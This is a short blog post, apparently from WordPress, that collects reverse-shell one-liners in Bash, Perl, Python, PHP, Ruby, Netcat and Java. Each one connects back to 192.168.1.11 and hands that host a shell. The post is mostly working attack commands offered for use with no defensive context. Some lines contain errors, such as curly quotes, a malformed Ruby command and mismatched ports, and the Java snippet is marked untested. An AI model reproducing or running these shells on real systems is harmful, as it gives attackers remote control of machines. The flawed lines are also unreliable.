Reverse TCP Shell

A collection of reverse shells that use commonly installed programming languages, or binaries (nc, telnet, bash, etc). Here are a collection of reverse shells, present in Kali Linux.

Bash

bash -i >& /dev/tcp/192.168.1.11/443 0>&1

PERL

perl -e ‘use Socket;$i=”192.168.1.11″;$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’

Python

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.1.11”,443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

PHP

php -r ‘$sock=fsockopen(“192.168.1.11”,4444);exec(“/bin/sh -i <&3 >&3 2>&3”);’

Ruby

ruby -rsocket -e’f=TCPSocket.open(“192.168.1.11”,433.to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’

Netcat

nc -e /bin/sh 192.168.1.11 443

Java

r = Runtime.getRuntime()
p = r.exec([“/bin/bash”,”-c”,”exec 5<>/dev/tcp/192.168.1.11/443;cat <&5 | while read line; do \$line 2>&5 >&5; done”] as String[])
p.waitFor()[Untested submission from anonymous reader]

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s